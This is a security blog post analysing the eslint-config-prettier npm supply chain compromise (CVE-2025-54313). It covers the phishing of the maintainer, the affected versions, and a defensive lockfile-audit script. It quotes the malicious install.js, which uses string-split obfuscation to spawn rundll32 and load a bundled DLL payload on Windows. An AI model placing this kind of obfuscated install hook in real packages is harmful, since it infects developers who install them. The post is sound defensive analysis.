Malicious npm Supply Chain Attack: Deep Technical Dive into CVE-2025-54313 in eslint-config-prettier

A sophisticated supply chain attack compromised eslint-config-prettier npm package versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7, embedding malware that targets Windows systems. This post provides a detailed technical breakdown of CVE-2025-54313, including attack vectors, affected versions, and actionable mitigation strategies for security professionals.
CVE Analysis

ZeroPath Security Research

2025-07-19

When trusted open-source tools become attack vectors, the consequences ripple across the global software supply chain. The recent compromise of eslint-config-prettier—a package with over 30 million weekly downloads—demonstrates just how quickly a single phishing email can cascade into widespread malware infections. Security teams and developers alike must understand the technical intricacies of CVE-2025-54313 to defend their environments and restore trust in their toolchains.

Introduction

The JavaScript ecosystem relies heavily on npm packages for code linting and formatting. eslint-config-prettier is a cornerstone of this ecosystem, bridging Prettier and ESLint to enforce consistent code style across millions of projects. In July 2025, attackers exploited this trust by compromising the package's maintainer credentials, injecting malware into four widely-used versions. The attack targeted Windows developers, leveraging npm's post-install scripts to execute a malicious DLL. This incident is a stark reminder of the fragility of open-source supply chains and the need for robust security practices at every layer.

About the Parties Involved

eslint-config-prettier is a configuration package that disables formatting rules in ESLint that might conflict with Prettier, ensuring seamless integration between the two tools. Maintained by JounQin, it is a critical dependency for countless JavaScript and TypeScript projects. With tens of millions of weekly downloads, its compromise has far-reaching implications for the global software industry, affecting both individual developers and large enterprises.

Technical Information

The attack began with a targeted phishing campaign. The maintainer of eslint-config-prettier received a convincing email purporting to be from npm support, referencing a real support ticket and containing legitimate npm links. However, the login link pointed to a typosquatted domain (npnjs.com), where the maintainer's credentials and npm token were harvested (stepsecurity.io, bleepingcomputer.com).

Armed with the stolen token, attackers published four malicious versions of eslint-config-prettier (8.10.1, 9.1.1, 10.1.6, 10.1.7) directly to the npm registry. These versions introduced an install.js script in the package root. The script contained obfuscated logic to evade casual inspection:

```javascript
// install.js as shipped in the malicious versions. The string concatenation keeps the
// literal tokens "child_process", "spawn" and "rundll32" out of the file so that naive
// grep-style scanners do not match them.
const os = require('os');
const path = require('path');

if (os.platform() === 'win32') {
  require('chi' + 'ld_pro' + 'cess')['sp' + 'awn']('rund' + 'll32', [
    path.join(__dirname, './node-gyp.dll') + ',main',
  ]);
}
```

This code checks whether the installation is running on Windows. If so, it spawns rundll32 to load the bundled node-gyp.dll and call its exported main function (the ,main suffix is rundll32's DLL,EntryPoint syntax). The DLL is a Windows malware payload; initial analysis suggests it performs reconnaissance and may establish persistence or exfiltrate data (github.com/prettier/eslint-config-prettier/issues/339, whitehat.eu).

The attack was limited to Windows environments due to the explicit platform check. Linux and macOS users were unaffected. The malicious versions were quickly flagged by the community when automated tools (like RenovateBot) noticed discrepancies between npm and GitHub releases, and when the presence of unexpected install scripts was detected (stepsecurity.io).

The malware's execution chain relies on npm's post-install lifecycle, which runs scripts declared in the package's package.json after the package is installed. This mechanism, while useful for legitimate build steps, is a well-known attack surface for supply chain threats; installing with --ignore-scripts (or setting ignore-scripts=true in .npmrc) prevents such scripts from running at all. The obfuscated code further delayed detection, as it bypassed simple string-matching heuristics.

Affected Systems and Versions

The following versions of eslint-config-prettier are confirmed to be malicious:

  • 8.10.1
  • 9.1.1
  • 10.1.6
  • 10.1.7

Only Windows systems are affected, as the install script checks for the win32 platform. Projects using version ranges (e.g., ^10.1.0) or automated dependency updates (e.g., Dependabot, RenovateBot) may have inadvertently installed these versions. The attack also impacted related packages maintained by the same author, including eslint-plugin-prettier (4.2.2, 4.2.3) and synckit (0.11.9), but the primary focus of this CVE is eslint-config-prettier (npmjs.com).
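The two detection signals described above (a locked dependency at a known-malicious version, and a package that declares an install script) can be checked directly against a project's lockfile. The following is an added example, not code from the original post or from the eslint-config-prettier project; it also answers the version-range question, showing which of the listed versions a caret range such as ^10.1.0 would have admitted. The lockfile is a constructed sample; the hasInstallScript flag is the field npm writes into lockfileVersion 2/3 entries whose package.json declares preinstall, install or postinstall.

```javascript
// Added example; not from the original post or the eslint-config-prettier project. Audits a
// package-lock.json (lockfileVersion 2/3 "packages" map) for the versions named in this
// advisory and for dependencies that declare npm install scripts.
const KNOWN_BAD = { // versions the post lists as malicious, keyed by package name
  'eslint-config-prettier': ['8.10.1', '9.1.1', '10.1.6', '10.1.7'],
  'eslint-plugin-prettier': ['4.2.2', '4.2.3'],
  synckit: ['0.11.9'],
};

// Findings: locked versions in KNOWN_BAD, and packages npm marks hasInstallScript (preinstall/install/postinstall present).
function auditLock(lock) {
  const findings = [];
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    if (lockPath === '') continue; // root project entry, not a dependency
    const name = lockPath.split('node_modules/').pop(); // nested path -> innermost name
    const hit = { name, version: entry.version };
    if ((KNOWN_BAD[name] || []).includes(entry.version)) findings.push({ ...hit, reason: 'known-malicious version' });
    if (entry.hasInstallScript) findings.push({ ...hit, reason: 'declares install script' });
  }
  return findings;
}

// Minimal "^X.Y.Z" check so no semver dependency is needed: a caret pins every component
// up to and including the first non-zero one, and the remaining components must not be below the base.
function caretAdmits(range, version) {
  if (!range.startsWith('^')) return false;
  const [base, v] = [range.slice(1), version].map((s) => s.split('.').map(Number));
  const fixed = base.findIndex((n) => n > 0);
  if (fixed < 0 || v.slice(0, fixed + 1).some((n, i) => n !== base[i])) return false;
  for (let i = fixed + 1; i < 3; i++) if (v[i] !== base[i]) return v[i] > base[i];
  return true;
}

// Which malicious versions would a declared range have pulled in on a dependency update?
function rangeRisk(name, range) {
  return (KNOWN_BAD[name] || []).filter((v) => caretAdmits(range, v));
}

// Constructed sample lockfile: a project declaring "^10.1.0" that resolved to 10.1.7.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo', dependencies: { 'eslint-config-prettier': '^10.1.0' } },
    'node_modules/eslint-config-prettier': { version: '10.1.7', hasInstallScript: true },
    'node_modules/prettier': { version: '3.3.3' },
    'node_modules/synckit': { version: '0.11.8' },
  },
};

console.log(auditLock(SAMPLE_LOCK), rangeRisk('eslint-config-prettier', '^10.1.0'));
```

Point auditLock at a real lockfile with JSON.parse(fs.readFileSync('package-lock.json', 'utf8')) to audit a project; the hasInstallScript finding is the same signal that exposed the unexpected install.js in this incident.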

Vendor Security History

JounQin, the maintainer, is responsible for several high-profile npm packages. While there is no public record of previous security incidents involving eslint-config-prettier, the npm ecosystem has experienced multiple supply chain attacks in recent years. Notably, the event highlights ongoing challenges with maintainer account security and the need for ecosystem-wide enforcement of multi-factor authentication. The maintainer acted swiftly to revoke compromised credentials and coordinate with npm to deprecate malicious versions, but the incident reveals systemic weaknesses in npm's security posture (bleepingcomputer.com).

This post is based strictly on technical details and public advisories as of July 19, 2025. Security teams are encouraged to review all references for the latest updates and forensic guidance.

Source: This report was created using AI

If you have suggestions for improvement or feedback, please reach out to us at [email protected]
